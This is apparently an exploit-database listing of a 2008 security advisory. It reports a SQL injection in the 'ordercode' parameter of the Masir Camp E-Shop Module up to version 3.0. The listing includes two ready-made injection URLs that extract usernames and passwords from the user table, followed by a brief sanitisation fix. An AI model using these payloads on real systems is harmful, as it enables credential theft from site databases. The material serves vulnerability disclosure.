header-logo
Suggest Exploit
vendor:
Masir Camp E-Shop Module
by:
AmnPardaz Security Research Team
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Masir Camp E-Shop Module
Affected Version From: 3.0 and prior versions
Affected Version To: 3.0 and prior versions
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Masir Camp E-Shop Module <= 3.0 SQL Injection

Masir Camp is an advanced website management and content management software. It is vulnerable to SQL Injection in the 'veiworderstatus' parameter of the 'ordercode' parameter. An attacker can exploit this vulnerability by sending a malicious HTTP request with a crafted 'ordercode' parameter, such as 'foo' or 1=(select top 1 UserName from UserInfoView)-- or 'foo' or 1=(select top 1 Password from UserInfoView)--.

Mitigation:

Edit the source code to ensure that inputs are properly sanitized.
Source

Exploit-DB raw data:

########################## www.BugReport.ir #######################################
#
#        AmnPardaz Security Research Team
#
# Title: Masir Camp E-Shop Module <= 3.0 SQL Injection
# Vendor: www.masir.net
# Vulnerable Version: 3.0 and prior versions
# Exploit: Available
# Impact: Medium
# Fix: N/A
# Original Advisory: http://bugreport.ir/index_52.htm
###################################################################################

####################
1. Description:
####################
    Masir Camp is an advanced website management and content management software. It is suitable for management, control and information presentation.
"Masir Camp" increases your ability to manage and control your website or weblog.It use Microsoft .Net and MS-SQL. But you have no limitation to use other DBMSs.

####################
2. Vulnerabilities:
####################
    2.1. Injection Flaws. SQL Injection in "veiworderstatus" in "ordercode" parameter.


####################
3. Exploits/POCs:
####################
    http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)--
    http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)--

####################
4. Solution:
####################
    Edit the source code to ensure that inputs are properly sanitized.

####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

# milw0rm.com [2008-09-07]